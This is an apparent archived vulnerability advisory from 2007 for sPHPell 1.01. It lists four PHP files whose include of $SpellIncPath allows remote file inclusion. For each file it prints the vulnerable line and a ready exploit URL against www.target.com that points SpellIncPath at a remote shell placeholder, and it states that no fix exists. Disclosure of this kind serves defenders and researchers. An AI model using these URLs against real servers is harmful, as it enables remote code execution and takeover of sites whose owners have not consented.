sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities

2007-06-30 00:00:00

sphpell - 1.01 Remote File Include
---------------------------------------------------------------------------------
Bulan: Cyber-security // Cyber-security.org
---------------------------------------------------------------------------------
script download:http://sourceforge.net/project/showfiles.php?group_id=82330

---------------------------------------------------------------------------------
ERROR [1];spellcheckpageinc.php?

include($SpellIncPath."spellcheckvars.php");

BUG: www.target.com/checkpageinc.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [2];spellchecktext.php?

include($SpellIncPath."spellcheckvars.php");

BUG: www.target.com/spellchecktext.php? SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [3];spellcheckwindow.php?

include($SpellIncPath."spellcheckvars.php");

BUG: www.target.com/spellcheckwindow.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [4];spellcheckwindowframeset.php?

include($SpellIncPath."spellcheckvars.php");

BUG: www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL

---------------------------------------------------------------------------------
d0rk: :(

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.